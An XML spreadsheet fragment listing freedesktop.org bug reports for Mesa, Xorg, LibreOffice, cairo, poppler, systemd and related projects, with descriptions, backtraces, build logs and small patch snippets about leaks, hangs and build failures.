  </si>
  <si>
    <t>Memory leak on failure to create an ir_constant in calculate_iterations in loop_controls.cpp</t>
  </si>
  <si>
    <t>There is a memory leak on failure to create an ir_constant in calculate_iterations in loop_controls.cpp.
If iter is NULL the method returns without deleting the allocated memory.
See below:
int
calculate_iterations(ir_rvalue *from ir_rvalue *to ir_rvalue *increment
		     enum ir_expression_operation op)
{
   if (from == NULL || to == NULL || increment == NULL)
      return -1
   void *mem_ctx = ralloc_context(NULL)
   ir_expression *const sub =
      new(mem_ctx) ir_expression(ir_binop_sub from-&gt;type to from)
   ir_expression *const div =
      new(mem_ctx) ir_expression(ir_binop_div sub-&gt;type sub increment)
   ir_constant *iter = div-&gt;constant_expression_value()
   if (iter == NULL)
      return -1
If iter == NULL then I should be seeing something like:
   if (iter == NULL) {
      // sub &amp; div  are created as emplacement new so delete is not required
      // unless meme_ctx has a destructor.
      ralloc_free(mem_ctx)
      return -1
   }</t>
  </si>
  <si>
    <t>damian.dixon</t>
  </si>
  <si>
    <t>XORG-4989</t>
  </si>
  <si>
    <t>[ATI/radeon] Hang: Idle timed out resetting engine...</t>
  </si>
  <si>
    <t>Sometimes X locks up when I start it. It kills the radeon chip (bios post code
needed to get the panel running again) and doesn't respond to the keyboard. It
also consumes 100% cpu all in user space. The log is full of:
(EE) RADEON(0): Idle timed out resetting engine...</t>
  </si>
  <si>
    <t>LIBREOFFICE-81110</t>
  </si>
  <si>
    <t>Threaded 3D chart rendering ...</t>
  </si>
  <si>
    <t>Produce a prototype infrastructure patch for this to demonstrate the design and show how this should be done.</t>
  </si>
  <si>
    <t>MESA-8521</t>
  </si>
  <si>
    <t>AllocAndFetchScreenConfigs unlocks twice</t>
  </si>
  <si>
    <t>AllocAndFetchScreenConfigs always calls UnlockDisplay twice without an
intervening LockDisplay. We found this because XCB asserts that you can't unlock
the display if you don't have it locked.
While fixing this we noticed that SyncHandle isn't consistently called after
UnlockDisplay in this function.
--- glxext.c    26 Sep 2006 23:56:20 -0000      1.25
+++ glxext.c    6 Oct 2006 00:17:39 -0000
@@ -101611 +101611 @@ static Bool AllocAndFetchScreenConfigs(D
        if (!_XReply(dpy (xReply*) &amp;reply 0 False)) {
            /* Something is busted. Punt. */
            UnlockDisplay(dpy)
+           SyncHandle()
            FreeScreenConfigs(priv)
            return GL_FALSE
        }
-       UnlockDisplay(dpy)
        if (!reply.numVisuals) {
            /* This screen does not support GL rendering */
            UnlockDisplay(dpy)</t>
  </si>
  <si>
    <t>CAIRO-7965</t>
  </si>
  <si>
    <t>cairo_fill_extents gives bogus results for perfectly horizontal paths</t>
  </si>
  <si>
    <t>In my test program which draws a perfectly horizontal path and then prints
stroke and fill extents:
fill: x1=32767000000 y1=32767000000 x2=-32768000000 y2=-32768000000
stroke: x1=-10000000 y1=170000000 x2=760000000 y2=190000000
It gives bogus results for the fill extents as you can see.  If the path is not
perfectly horizontal then the fill extents get sane values.</t>
  </si>
  <si>
    <t>MESA-29476</t>
  </si>
  <si>
    <t>[GM965] Compiz hangs</t>
  </si>
  <si>
    <t>Created attachment 37754
Backtrace of frozen compiz
Thinkpad X61 with GM965
Arch Linux x86_64
kernel 2.6.35-git+ (zen.git c544a07)
xorg-server 1.8.1.902-1
xf86-video-intel current (git 19c48d3)
libdrm current (git b04515c)
mesa current (git 6e1f9bc)
Either compiz 0.8.6 or 0.9.0 will do. When running with SwapbuffersWait after some time triggering the Scale effect over and over again the display will freeze but the mouse cursor will still move.
Causing a vt switch via chvt still works in this state.
After kill -9 compiz and returning to X display is still frozen (including mouse cursor) and switching back to a console will become impossible even via SysRQ.
Attaching a backtrace of compiz in the frozen state.</t>
  </si>
  <si>
    <t>XORG-55346</t>
  </si>
  <si>
    <t>Xorg crashed with SIGABRT in list_is_empty()</t>
  </si>
  <si>
    <t>downstream bug from ubuntu with several dupes:
https://bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/1053836
we do have the autobind patch from Dave applied but these machines are not all hybrid ones and the crash can occur on resume from suspend so it's not related to how the xserver is initialized.
stacktrace:
#0  0x00007f8a16b1a405 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
        resultvar = 0
        pid = 
        selftid = 4706
#1  0x00007f8a16b1db6b in __GI_abort () at abort.c:91
        save_stage = 2
        act = {__sigaction_handler = {sa_handler = 0x54 sa_sigaction = 0x54} sa_mask = {__val = {140231098526174 140231062760520 140231096579296 1 96 4294967295 0 4294967295 140231098548268 4294967295 1 4313384 0 140231101134304 140231101134464 140231096762368}} sa_flags = 412358532 sa_restorer = 0x7f8a00000001}
        sigs = {__val = {32 0 }}
#2  0x00007f8a18d06b9e in OsAbort () at ../../os/utils.c:1266
No locals.
#3  0x00007f8a18bedd7c in ddxGiveUp (error=EXIT_ERR_ABORT) at ../../../../hw/xfree86/common/xf86Init.c:1096
        i = 
#4  0x00007f8a18d0bb52 in AbortServer () at ../../os/log.c:652
No locals.
#5  0x00007f8a18d0c3ed in FatalError (f=f@entry=0x7f8a18d35668 Caught signal %d (%s). Server aborting\n) at ../../os/log.c:793
        args = {{gp_offset = 24 fp_offset = 48 overflow_arg_area = 0x7fff42ad6fa0 reg_save_area = 0x7fff42ad6ee0}}
        args2 = {{gp_offset = 8 fp_offset = 48 overflow_arg_area = 0x7fff42ad6fa0 reg_save_area = 0x7fff42ad6ee0}}
        beenhere = 1
#6  0x00007f8a18d0494e in OsSigHandler (sip= signo=11 unused=) at ../../os/osinit.c:146
No locals.
#7  OsSigHandler (signo=11 sip= unused=) at ../../os/osinit.c:107
No locals.
#8  
No symbol table info available.
#9  list_is_empty (head=) at ../../src/intel_list.h:269
No locals.
#10 intel_mode_fini (intel=intel@entry=0x7f8a1a2ac880) at ../../src/intel_display.c:1774
        mode = 0x0
#11 0x00007f8a158872f5 in I830FreeScreen (arg=0x7f8a1a2abae0) at ../../src/intel_driver.c:1077
        scrn = 0x7f8a1a2abae0
        intel = 0x7f8a1a2ac880
#12 0x00007f8a18bf68b4 in xf86DeleteScreen (pScrn=0x7f8a1a2abae0) at ../../../../hw/xfree86/common/xf86Helper.c:237
        i = 
        scrnIndex = 0
        is_gpu = 0
#13 0x00007f8a18befbc3 in InitOutput (pScreenInfo=pScreenInfo@entry=0x7f8a18f8eda0 argc=argc@entry=9 argv=argv@entry=0x7fff42ad7798) at ../../../../hw/xfree86/common/xf86Init.c:628
        i = -1
        j = 
        k = 
        scr_index = 
        modulelist = 
        optionlist = 0x7f8a1a29d920
        screenpix24 = 
        pix24 = 
        pix24From = X_DEFAULT
        pix24Fail = 0
        autoconfig = 
        sigio_blocked = 0
        configured_device = 
#14 0x00007f8a18b9c386 in main (argc=9 argv=0x7fff42ad7798 envp=) at ../../dix/main.c:204
        i = 
        alwaysCheckForInput = {0 1}</t>
  </si>
  <si>
    <t>TELEPATHY-35137</t>
  </si>
  <si>
    <t>Overwritten_By_Nickname should be set on FN/NICKNAME</t>
  </si>
  <si>
    <t>If you're on Gtalk the vcard field for your alias is FN
Otherwise it's NICKNAME.
Contact_Info_Field_Flags has a Overwritten_By_Nickname member which should be present for FN or NICKNAME (as appropriate) in the SupportedFields property.
An easy patch gogogogo!</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-21451</t>
  </si>
  <si>
    <t>Wrong locale code in Keyboard Indicator 2.26.0 for Kyrgyzstan</t>
  </si>
  <si>
    <t>Keyboard Indicator 2.26.0 gives 'Kir' for Kyrgyz Republic (Kyrgyzstan) when officially our country's name is spelled with 'y' as a second letter - Kyrgyz Republic or Kyrgyzstan. The best way for the local indications would be internationally adopted two-letter country codes according to ISOâ€“3166â€“1. However if the current practice of using three letters should be continued then the local code for our country should be corrected to 'Kyr'. Not a coder to offer a patch sorry and thank you for your attention.</t>
  </si>
  <si>
    <t>foranycase</t>
  </si>
  <si>
    <t>LIBREOFFICE-50118</t>
  </si>
  <si>
    <t>calc UI Use English function names not as it should be</t>
  </si>
  <si>
    <t>In LibreOffice you can activate this feature under the preferences for LibreOffice Calc --&gt; Forumule 
I noticed that apparently this feature is not implemented or working completely?
In a sheet using YEARFRAC it shows JAAR.DEEL with a Dutch locale and this setting activated.</t>
  </si>
  <si>
    <t>narebeestjes</t>
  </si>
  <si>
    <t>XORG-296</t>
  </si>
  <si>
    <t>[PATCH] ELF loader fixes for non-exec stack/heap on Linux</t>
  </si>
  <si>
    <t>The ELF loader breaks on Linux systems running non-exec stack/heap technology
such as exec-shield.  The patch I'm attaching below fixes 3 problems in
the loader.</t>
  </si>
  <si>
    <t>MESA-93601</t>
  </si>
  <si>
    <t>Rain and insects are not rendered in Shadow of Mordor with Intel Mesa driver</t>
  </si>
  <si>
    <t>Created attachment 120823
Benchmark how it should look like
Hello devs
the SoM-Benchmark should show rain and insects flying around a hive.
But they are not visible with latest git master.
I have attached a screenshot where you can see rain and the hive in front of Talon.
The rain should also be visible ingame... there are scenarios with nigth daylight ... and rainy weather. You know it when Talons cloak is wet like in the screenshot.
Would be really nice if you could figure this out.
Thanks in advance
Darius</t>
  </si>
  <si>
    <t>MESA-39095</t>
  </si>
  <si>
    <t>egl_gallium.so failed to compile</t>
  </si>
  <si>
    <t>Relevant part of the log:
/bin/install -c -d /home/mladen/Programi/PKGBUILDs/mesa/mesa-git/pkg/mesa-git/usr/lib/xorg/modules/dri
/bin/sh ../../../../bin/minstall -m 755 swrastg_dri.so /home/mladen/Programi/PKGBUILDs/mesa/mesa-git/pkg/mesa-git/usr/lib/xorg/modules/dri
make[3]: Leaving directory `/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/gallium/targets/dri-swrast'
make[3]: Entering directory `/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/gallium/targets/egl-static'
/bin/sh ../../../../bin/mklib -o egl_gallium.so -noprefix -linker 'g++' \
        -ldflags '-L../../../../lib -Wl--no-undefined -Wl--hash-style=gnu -Wl--as-needed' \
        -cplusplus -install ../../../../lib/egl  \
        egl.o egl_pipe.o egl_st.o -Wl--start-group ../../../../src/gallium/auxiliary/libgallium.a ../../../../src/gallium/drivers/identity/libidentity.a ../../../../src/gallium/drivers/r600/libr600.a ../../../../src/gallium/drivers/rbug/librbug.a ../../../../src/gallium/drivers/softpipe/libsoftpipe.a ../../../../src/gallium/drivers/trace/libtrace.a ../../../../src/gallium/state_trackers/egl/libegl.a ../../../../src/gallium/state_trackers/vega/libvega.a ../../../../src/gallium/winsys/r600/drm/libr600winsys.a ../../../../src/gallium/winsys/sw/xlib/libws_xlib.a ../../../../src/mesa/libmesagallium.a -Wl--end-group \
        -lEGL -lOpenVG -lX11 -lXext -lXfixes -ldl -ldrm -ldrm_radeon -lgbm -lglapi -lm -lpthread -lrt -ludev
mklib: Making Linux shared library:  egl_gallium.so
../../../../src/gallium/state_trackers/egl/libegl.a(dri2.o): In function `DRI2WireToEvent':
/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/glx/dri2.c:104: undefined reference to `dri2GetGlxDrawableFromXDrawableId'
/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/glx/dri2.c:132: undefined reference to `GetGLXDrawable'
collect2: ld Ð²Ñ€Ð°Ñ‚Ð¸ Ð¸Ð·Ð»Ð°Ð·Ð½Ð¸ ÑÑ‚Ð°Ñ‚ÑƒÑ 1
mklib: Installing egl_gallium.so in ../../../../lib/egl
mv: cannot stat `egl_gallium.so': No such file or directory
/bin/install -c -d /home/mladen/Programi/PKGBUILDs/mesa/mesa-git/pkg/mesa-git/usr/lib/egl
for out in ../../../../lib/egl/egl_gallium.so do \
        /bin/sh ../../../../bin/minstall -m 755 $out /home/mladen/Programi/PKGBUILDs/mesa/mesa-git/pkg/mesa-git/usr/lib/egl \
done
Unknown type of argument:  ../../../../lib/egl/egl_gallium.so
make[3]: *** [install] Error 1
make[3]: Leaving directory `/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/gallium/targets/egl-static'
make[2]: *** [install] Error 1
make[2]: Leaving directory `/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src/gallium/targets'
make[1]: *** [install] Error 1
make[1]: Leaving directory `/home/mladen/Programi/PKGBUILDs/mesa/mesa-git/src/mesa-build/src'
make: *** [install] Error 1
Compilation flags:
  ./autogen.sh --prefix=/usr \
  --with-dri-driverdir=/usr/lib/xorg/modules/dri \
  --with-gallium-drivers=r600swrast \
  --with-dri-drivers= \
  --with-egl-platforms=x11drm \
  --disable-xorg \
  --enable-openvg \
  --enable-gles1 \
  --enable-gles2 \
  --enable-xcb \
  --enable-glx-tls \
  --enable-texture-float \
  --enable-shared-dricore \
  --enable-shared-glapi \
  --disable-glut \
  --enable-gallium-egl \
  --disable-gallium-llvm \
  --enable-debug
glproto 1.4.14
libdrm 2.4.26
dri2proto 2.6</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13343</t>
  </si>
  <si>
    <t>Please rename Upstart project to InitKit</t>
  </si>
  <si>
    <t>The upstart.freedesktop.org website was never set up properly -- the directory mentioned in #11712 does not exist.  Please set up initkit.freedesktop.org instead.
Please rename the upstart@lists.freedesktop.org mailing list to initkit@lists.freedesktop.org
No bugzilla or git repo are needed at this time.
Thanks</t>
  </si>
  <si>
    <t>SYSTEMD-65818</t>
  </si>
  <si>
    <t>systemd gets stuck in loop with ConditionACPower in timer activated service</t>
  </si>
  <si>
    <t>Created attachment 80900
backup service
I use the attached service and timer units for backup purposes. The service file contains ConditionACPower=yes because I don't want the backup to run when the power isn't plugged in.
This works as expected as long as the power is plugged in. If however the service is triggered by the timer while the power is unplugged systemd gets stuck in a loop. CPU usage by systemd goes up to about 75% systemd-journal up to 35% and the journal is flooded with the following message:
Jun 16 12:17:42 mus-laptop systemd[1]: Started Backup laptop
Every 10 seconds the following is logged followed by another few hundred Started backup-laptop messages:
Jun 16 12:17:52 mus-laptop systemd-journal[178]: Suppressed 16332 messages from /system
Jun 16 12:17:52 mus-laptop systemd[1]: Started Backup laptop.
Note that this doesn't happen when I trigger the service manually only if it is triggered by the timer. The loop stops as soon as I stop the timer.
systemctl status backup-laptop shows the following while it is stuck in the loop:
backup-laptop.service - Backup laptop
   Loaded: loaded (/etc/systemd/system/backup-laptop.service static)
   Active: inactive (dead) since Sun 2013-06-16 12:02:23 CEST 21min ago
          start condition failed at Sun 2013-06-16 12:24:03 CEST 2ms ago
 Main PID: 17667 (code=exited status=0/SUCCESS)
   CGroup: name=systemd:/system/backup-laptop.service
I'm running Arch Linux x64 with systemd 204.</t>
  </si>
  <si>
    <t>mus.svz</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-6914</t>
  </si>
  <si>
    <t>chicony ku-0108 multimedia extension symbol map</t>
  </si>
  <si>
    <t>symbol_inet map for USB KU-0108:
ID 04f2:0111 Chicony Electronics Co. Ltd
There are 3keys on left (Cut Copy Paste) which does not generate anny key code
probably need special handling by kernel/Xorg_driver (in evdev generate key code 7 )</t>
  </si>
  <si>
    <t>POPPLER-59186</t>
  </si>
  <si>
    <t>configure in poppler 0.22.0 fails to find jpeglib.h</t>
  </si>
  <si>
    <t>Configuration was:
env LANG=C PATH=${HOME}/Softwaren64/bin:/usr/bin:/opt/local/x86_64-apple-darwin10.8.0/bin:/opt/local/bin:$PATH ./configure --prefix=${HOME}/Softwaren64 --with-pic --enable-static --enable-cms=none --enable-introspection=no --disable-utils --disable-poppler-qt4 --x-includes=/usr/X11/include --x-libraries=/usr/X11/lib CPPFLAGS=-H -I${HOME}/Softwaren64/include CFLAGS=-pipe -fPIC -fno-common -Os -march=core2 -mtune=core2 -m64 -fomit-frame-pointer -msse4.2 LDFLAGS=-m64 -Wl-t -Wl-dead_strip_dylibs -L${HOME}/Softwaren64/lib PKG_CONFIG_PATH=${HOME}/Softwaren64/lib/pkgconfig:/usr/lib/pkgconfig:/usr/X11/share/pkgconfig:/usr/X11/lib/pkgconfig
In ${HOME}/Softwaren64 I am preparing shared and static libraries etc. to build FontForge. There is also jpeg8d installed. No particle of libjpeg6b can be found.
The configure goes:
	checking for libjpeg6b... no
	checking for libjpeg... -ljpeg
	checking jpeglib.h usability... no
	checking jpeglib.h presence... no
	checking for jpeglib.h... no
	configure: WARNING:
	There is an installation error in jpeg support. You seem to have only one
	of either the headers _or_ the libraries installed. You may need to either
	provide correct --with-extra-... options or the development package of
	libjpeg6b. You can get a source package of libjpeg from http://www.ijg.org/
	Disabling JPEG support.
	checking libjpeg.h works correctly... ok
	checking for LIBPNG... yes
	checking for FREETYPE... yes
config.log shows that the script initially works OK:
	configure:20271: checking for libjpeg
	configure:20300: gcc -std=gnu99 -o conftest -pipe -fPIC -fno-common -Os -march=core2 -mtune=core2 -m64 -fomit-frame-pointer -msse4.2    -H -I/Users/pete/Softwaren64/include -m64 -Wl-t -Wl-dead_strip_dylibs -L/Users/pete/Softwaren64/lib conftest.c    -ljpeg -lm &gt;&amp;5
	/usr/lib/crt1.10.6.o
	/var/folders/PR/PR9ZvjydEAmPxO7U5PFnBk+++TI/-Tmp-//cc7EIUOt.o
	/Users/pete/Softwaren64/lib/libjpeg.dylib
	/usr/lib/libm.dylib
	/usr/lib/libSystem.dylib
	/usr/lib/system/libmathCommon.A.dylib
	configure:20300: $? = 0
	configure:20316: result: -ljpeg
Therefore it finds the library. But for the C header file it forgets the -I/Users/pete/Softwaren64/include (complete CPPFLAGS) so it can't it:
	configure:20335: checking jpeglib.h usability
	configure:20335: gcc -std=gnu99 -c -pipe -fPIC -fno-common -Os -march=core2 -mtune=core2 -m64 -fomit-frame-pointer -msse4.2    -pipe -fPIC -fno-common -Os -march=core2 -mtune=core2 -m64 -fomit-frame-pointer -msse4.2    conftest.c &gt;&amp;5
	conftest.c:77:21: error: jpeglib.h: No such file or directory
	configure:20335: $? = 1
Mac OS X 10.5.8 Snow Leopard</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-77272</t>
  </si>
  <si>
    <t>PBAP</t>
  </si>
  <si>
    <t>PBAP: download in chunks to make progress after interrupts</t>
  </si>
  <si>
    <t>Downloading in chunks with PullAll and Offset+MaxCount was originally brought up for issue #72112. The purpose mentioned there (being able to stop the sync between chunks) was better addressed with the Bluez 5.15 suspend/resume API.
However downloading in chunks is useful for another purpose: just downloading large address books (5000 contacts 8KB photo data in each contact) from slow devices (Samsung Galaxy S3) can take 45 minutes.
If the driver always turns off the car after a 15 minute commute he'll never get the entire address book cached. Downloading in chunks can help by starting the download at varying offsets.
The downside is that the PBAP spec doesn't support downloading in chunks reliably if contacts get deleted during the download.</t>
  </si>
  <si>
    <t>MESA-17404</t>
  </si>
  <si>
    <t>glColor3i does not set implicitly the value of the alpha (RGBA color)</t>
  </si>
  <si>
    <t>The standard states:
glColor sets a new four-valued RGBA color. glColor has two major variants: glColor3 and glColor4. glColor3 variants specify new red green and blue values explicitly and set the current alpha value to 1.0 (full intensity) implicitly. but invocation of the glColor3i interface does not set the alpha value to 1.0 (full intensity).</t>
  </si>
  <si>
    <t>apetrosyan</t>
  </si>
  <si>
    <t>LIBREOFFICE-60406</t>
  </si>
  <si>
    <t>LibreLogo: Name conflict in procedure handling</t>
  </si>
  <si>
    <t>Created attachment 74328
Bad recognition of procedure name 'foo' in variable name 'foox'
Attached test file doesn't run in the recent master. 1-line patch is committed.</t>
  </si>
  <si>
    <t>DRI-89882</t>
  </si>
  <si>
    <t>[SKL]igt/kms_cursor_crc sporadically causes system hang</t>
  </si>
  <si>
    <t>Created attachment 114840
dmesg
System Environment:
--------------------------
Regression: not sure
Non-working platforms: SKL
==kernel==
--------------------------
drm-intel-nightly/d72ff1ab1499711c941831400629c14493313b3a
commit d72ff1ab1499711c941831400629c14493313b3a
Author: Daniel Vetter 
Date:   Tue Mar 31 17:30:12 2015 +0200
    drm-intel-nightly: 2015y-03m-31d-15h-29m-33s UTC integration manifest
==Bug detailed description==
-----------------------------
Run ./kms_cursor_crc --run-subtest cursor-256x256-onscreen on SKL-Y with -nightly kernel it causes system hang at the 2nd round.
output:
IGT-Version: 1.10-g2f0e3cd (x86_64) (Linux: 4.0.0-rc6_drm-intel-nightly_d72ff1_2
Beginning cursor-256x256-onscreen on pipe A connector eDP-1
............................
cursor-256x256-onscreen on pipe A connector eDP-1: PASSED
Beginning cursor-256x256-onscreen on pipe B connector eDP-1
............................
cursor-256x256-onscreen on pipe B connector eDP-1: PASSED
Beginning cursor-256x256-onscreen on pipe C connector eDP-1
............................
cursor-256x256-onscreen on pipe C connector eDP-1: PASSED
Subtest cursor-256x256-onscreen: SUCCESS (29.165s)
real    0m29.859s
user    0m5.726s
sys     0m0.527s
root@x-skly05:/GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests# time ./kms_cursor_crc --run-subtest cursor-256x256-onscreen
IGT-Version: 1.10-g2f0e3cd (x86_64) (Linux: 4.0.0-rc6_drm-intel-nightly_d72ff1_20150401+ x86_64)
Beginning cursor-256x256-onscreen on pipe A connector eDP-1
.Warning on condition crc-&gt;crc[i] == 0xffffffff in fucntion crc_sanity_checks file igt_debugfs.c:494
Suspicious CRC: it looks like the CRC read back was from a register in a powered down well
==Reproduce steps==
---------------------------- 
1. run ./kms_cursor_crc --run-subtest cursor-256x256-onscreen twice</t>
  </si>
  <si>
    <t>MESA-26317</t>
  </si>
  <si>
    <t>glsl compiled wrong</t>
  </si>
  <si>
    <t>vdrift data/shaders/full/vertex.glsl seems to compile wrong
I'll attach the shader and output.
from this line:
refmapdir = vec3(gl_TextureMatrix[2] * vec4(reflect(viewdir normal_eye)0))
reflect(viewdir normal_eye) sequence starts with:
 20: DP3 TEMP[0].w TEMP[1] TEMP[1]
Seems it's using same register for I and N.
also in the end we output 2 attribs from same temp:
 35: MOV OUTPUT[17] TEMP[3]
 36: MOV OUTPUT[18] TEMP[3]
Andre</t>
  </si>
  <si>
    <t>XORG-65381</t>
  </si>
  <si>
    <t>[sna] No usable configuration for screen</t>
  </si>
  <si>
    <t>Created attachment 80313
Xorg log
I cannot use sna with current git everything works fine with uxa. This problem is not present in 2.21.8 release.
My system is Thinkpad X220 with Sandy Bridge graphics.
I'm attaching my Xorg configuration and log.</t>
  </si>
  <si>
    <t>nowrep</t>
  </si>
  <si>
    <t>XORG-23969</t>
  </si>
  <si>
    <t>[945GM] Hard lockups with KMS on intel graphics with Fedora Rawhide</t>
  </si>
  <si>
    <t>Ever since KMS was enabled in Fedora rawhide I've been experiencing random lockups on my HP Compaq nc6400 laptop with this graphics controller:
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME 943/940GML Express Integrated Graphics Controller (rev 03)
I've filed a bug against fedora with more details here:
https://bugzilla.redhat.com/show_bug.cgi?id=492686
There's dmesg output and xorg logs etc there.</t>
  </si>
  <si>
    <t>DRI-104894</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_vblank@pipe-[b|c]-ts-continuation-suspend - fail - Test assertion failure function vblank_ts_cont - Failed assertion: seq2 - seq1 &lt;= 150</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3708/shard-glkb6/igt@kms_vblank@pipe-c-ts-continuation-suspend.html
(kms_vblank:1353) CRITICAL: Test assertion failure function vblank_ts_cont file kms_vblank.c:379:
(kms_vblank:1353) CRITICAL: Failed assertion: seq2 - seq1 &lt;= 150
(kms_vblank:1353) CRITICAL: Last errno: 25 Inappropriate ioctl for device
(kms_vblank:1353) CRITICAL: unexpected vblank seq 188 should be &lt; 167
Subtest pipe-C-ts-continuation-suspend failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37402</t>
  </si>
  <si>
    <t>FORMATTING VIEWING Pagebreak not honoured after section endnotes</t>
  </si>
  <si>
    <t>Created attachment 46949
FORMATTING VIEWING Pagebreak not honoured after section endnotes (Example document)
Following a section with endnotes collected at the end of that section the pagebreak in a subsequent paragraph-style (ie. a paragraph following that section) is not honoured if the end-notes project into the page on which that paragraph starts.
Inserting an extra empty paragraph would not really be a fix since it will corrupt the document-flow when the pagesize is altered to suit a different output (ie. e-book iPad optimalized or A4 paper to print).
An example document is attached. 
Using LibreOffice 3.3.2 OOO330m19 (Build:202)  libreoffice-3.3.2.2 Debian package 1:3.3.2-2.</t>
  </si>
  <si>
    <t>josefk</t>
  </si>
  <si>
    <t>DRI-65157</t>
  </si>
  <si>
    <t>[SNB/IVB/HSW Bisected]igt/gem_reg_read not support</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: Sandybridge/Ivybridge/Haswell
Kernel: (drm-intel-fixes)3598706b52cb45ba0a9e8aa99ce5ac59140f2b8b
Bug detailed description:
-------------------------
It becomes not support on drm-intel-fixes and drm-intel-next-queued kernel.
It caused by igt commit 1cb4f90946289457c3b92773f2ce96b0b03e4a22.
commit 1cb4f90946289457c3b92773f2ce96b0b03e4a22
Author:     Imre Deak 
AuthorDate: Tue May 28 17:35:32 2013 +0300
Commit:     Daniel Vetter 
CommitDate: Tue May 28 18:32:32 2013 +0200
    tests/lib: make sure the GPU is idle at test start and exit
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=64270
    v2:
    - Make sure also that the GPU is idle at start and error exit of any
      test using drm_open_any(). (Daniel)
    v3:
    - actually call gem_quiescent_gpu() at exit
    Signed-off-by: Imre Deak 
    Signed-off-by: Daniel Vetter 
# echo $?
77
dmesg:
[ 8185.849621] [drm:i915_driver_open]
[ 8185.849636] [drm:intel_crtc_set_config] [CRTC:3] [FB:30] #connectors=1 (x y) (0 0)
[ 8185.849642] [drm:intel_modeset_stage_output_state] [CONNECTOR:18:HDMI-A-3] to [CRTC:3]
[ 8185.849645] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[ 8185.849647] [drm:intel_modeset_stage_output_state] [CONNECTOR:18:HDMI-A-3] to [CRTC:3]
[ 8185.849653] [drm:i915_driver_open]
[ 8185.849908] [drm:i915_getparam] Unknown parameter 22
[ 8185.849927] [drm:i915_driver_open]
[ 8185.849933] [drm:i915_driver_open]
[ 8185.849970] [drm:i915_getparam] Unknown parameter 22
[ 8185.850122] [drm:intel_crtc_set_config] [CRTC:3] [FB:30] #connectors=1 (x y) (0 0)
[ 8185.850125] [drm:intel_modeset_stage_output_state] [CONNECTOR:18:HDMI-A-3] to [CRTC:3]
[ 8185.850127] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[ 8185.850129] [drm:intel_modeset_stage_output_state] [CONNECTOR:18:HDMI-A-3] to [CRTC:3]
Reproduce steps:
----------------
1. ./gem_reg_read</t>
  </si>
  <si>
    <t>POPPLER-16592</t>
  </si>
  <si>
    <t>pdftohtml patch</t>
  </si>
  <si>
    <t>Created attachment 17484
pdftohtml patch
Hi developers
I have a patch for pdftohtml. I'm sorry if it's the wrong place for a patch. I'm not sure where should I send it. The patch bases on the latest stable poppler (0.8.4) and has the following improvements:
1) Html output keeps all the spaces with 
2) Xml output should be a valid xml. Problems with  and  are fixed and everything with  and  are removed in xml mode. Anyway the old xml wasn't usable. I hope to fix  and  later.
3) Ascent and descent are limited to reasonable? values.
4) Invalid date and time from pdf header are corrected to some valid value.
Boris</t>
  </si>
  <si>
    <t>tlknv</t>
  </si>
  <si>
    <t>XORG-1101</t>
  </si>
  <si>
    <t>Background pixmaps are painted with the wrong origin in child widgets of redirected windows</t>
  </si>
  <si>
    <t>When a child widget of a redirected window has a background pixmap set the 
background pixmap is painted with the wrong origin (the origin of the 
redirected window rather than that of the child widget). 
I've created a simple testcase that creates a 256x256 window then creates and 
sets a background pixmap for the window. The background pixmap has the same 
size as the window and is white with a black outline and an X drawn across 
it. 
If you start the application without a composite manager running the window 
is rendered correctly. But as soon as you start xcompmgr (any mode) you'll 
see the background redrawn with the origin of the window manager frame rather 
than that of the client window. 
This bug affects multiple KDE applications but only when composite is enabled 
and a composite manager is running. 
It's possible this is the same problem as reported in bug 1095.</t>
  </si>
  <si>
    <t>XORG-12404</t>
  </si>
  <si>
    <t>xf86-video-ati-6.7.192 + compiz lockups</t>
  </si>
  <si>
    <t>I'm experiencing reproducible Xorg lockups after upgrading to xf86-video-ati-6.7.192 when starting compiz (0.5.2). Lockups freeze everything I have to do a hard reboot after.
However I got compiz working after downgrading to 6.6.193.
I'm unsure which further information to submit Xorg.log is clean AFAICT.</t>
  </si>
  <si>
    <t>thomas.pani</t>
  </si>
  <si>
    <t>XORG-69119</t>
  </si>
  <si>
    <t>[hsw] WAIT_FOR_EVENT hangs (full screen vsync on pipe 1 with BCS)</t>
  </si>
  <si>
    <t>Created attachment 85463
/sys/kernel/debug/dri/0/i915_error_state
Greetings
I recently got a second display and have been experiencing reliable GPU lockups when starting full screen games on one of the displays. The steps to reproduce go as follows:
  1) Run gnome-shell 3.8.4 as your desktop interface (this is sufficient at least)
  2) Have a multi-monitor setup
  3) Start a full screen game that only appears on one monitor
The result is several lockups that are eventually freed and errors in dmesg and such. I believe that OpenGL acceleration of the desktop is a necessary prerequisite as this behavior doesn't occur in say fluxbox. But I've observed the behavior with multiple games some of which don't (I think) use OpenGL. At the least I've seen it with Awesomenauts (which may be using OpenGL) and Icewind Dale running in wine (which I would suspect isn't but I may be wrong).
This is definitely related to multi-monitors as well because if I disable one monitor in the gnome system settings the problem goes away. Also if the game does full screen by switching the monitors to mirror one another the problem will not occur (probably because that is equivalent to a single screen setup). I observed this with Battle for Wesnoth.
I had thought this was related to Bug 54226 but was informed that this was unrelated and should post a new bug.
I'll attach my Xorg.0.log dmesg and /sys/kernel/debug/dri/0/i915_error_state from after a lockup.
Relevant hardware/software is as follows:
  CPU/GPU: i7 4770/HD4600
  Motherboard: ASrock z87 extreme6
  arch linux kernel 3.10.10
  gnome-shell 3.8.4
  mesa 9.2.0
  xserver 1.14.2
